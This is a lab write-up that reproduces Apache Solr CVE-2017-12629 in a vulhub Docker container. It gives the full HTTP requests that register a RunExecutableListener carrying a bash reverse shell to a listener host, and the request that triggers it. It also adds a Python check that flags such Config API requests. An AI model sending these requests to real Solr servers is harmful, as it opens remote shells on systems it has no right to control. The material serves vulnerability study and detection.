Preface
Affected versions
Apache Solr < 7.1
Apache Lucene < 7.1
Environment setup
Start docker
systemctl start docker
Get vulhub
git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git
Enter the corresponding directory
cd vulhub/solr/CVE-2017-12629-RCE/
Start the container
docker-compose up -d
Check the running containers
docker ps
Vulnerability reproduction
Start a listener on the CentOS host
nc -lvvp 80
Create a listener
POST /solr/demo/config HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Length: 185

{"add-listener":{"event":"postCommit","name":"newlistener","class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/","args":["-c", "bash -i >& /dev/tcp/192.168.164.162/80 0>&1"]}}
Trigger the listener just added
POST /solr/demo/update HTTP/1.1
Host: 192.168.164.162:8983
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/json
Content-Length: 15

[{"id":"test"}]
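The step this reproduction relies on is a Config API request that registers a RunExecutableListener. As an added example (not part of the original write-up or of vulhub), the following Python check flags such requests in captured Solr traffic, so a proxy or log pipeline can alert before a later commit triggers the listener; the request records are constructed sample input, and the `scan` and `find_executable_listeners` names are this example's own.

```python
import json
import re

# Constructed sample of (method, path, body) records, as a reverse proxy or
# request log might deliver them. Not taken from the original page.
SAMPLE_REQUESTS = [
    ("POST", "/solr/demo/config",
     '{"add-listener":{"event":"postCommit","name":"newlistener",'
     '"class":"solr.RunExecutableListener","exe":"sh","dir":"/bin/",'
     '"args":["-c", "id"]}}'),
    ("POST", "/solr/demo/config",
     '{"set-property":{"updateHandler.autoCommit.maxTime":15000}}'),
    ("POST", "/solr/demo/update", '[{"id":"test"}]'),
    ("GET", "/solr/demo/select?q=*:*", ""),
]

# Config API endpoint of any core: /solr/<core>/config
CONFIG_PATH = re.compile(r"^/solr/[^/]+/config(?:\?.*)?$")
# Config API commands that register or change an event listener
LISTENER_OPS = ("add-listener", "update-listener")
# Short and fully qualified names of the listener that runs an executable
DANGEROUS_CLASSES = {"solr.RunExecutableListener",
                     "org.apache.solr.core.RunExecutableListener"}


def find_executable_listeners(method, path, body):
    """Return (operation, listener name, class, exe) tuples for every
    RunExecutableListener registered by this request; [] otherwise."""
    if method.upper() != "POST" or not CONFIG_PATH.match(path):
        return []
    try:
        doc = json.loads(body)
    except ValueError:
        return []  # not JSON; the Config API would reject it as well
    if not isinstance(doc, dict):
        return []
    findings = []
    for op, spec in doc.items():
        if op not in LISTENER_OPS:
            continue
        # a command may carry one listener object or a list of them
        for s in (spec if isinstance(spec, list) else [spec]):
            if isinstance(s, dict) and s.get("class") in DANGEROUS_CLASSES:
                findings.append((op, s.get("name"), s["class"], s.get("exe")))
    return findings


def scan(requests):
    """Run the check over all records and return the flagged ones."""
    return [(path,) + f for method, path, body in requests
            for f in find_executable_listeners(method, path, body)]
```

The same check applies to `update-listener`, which can repoint an already registered listener at a new executable.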
Reference articles
https://vulhub.org/#/environments/solr/CVE-2017-12629-RCE/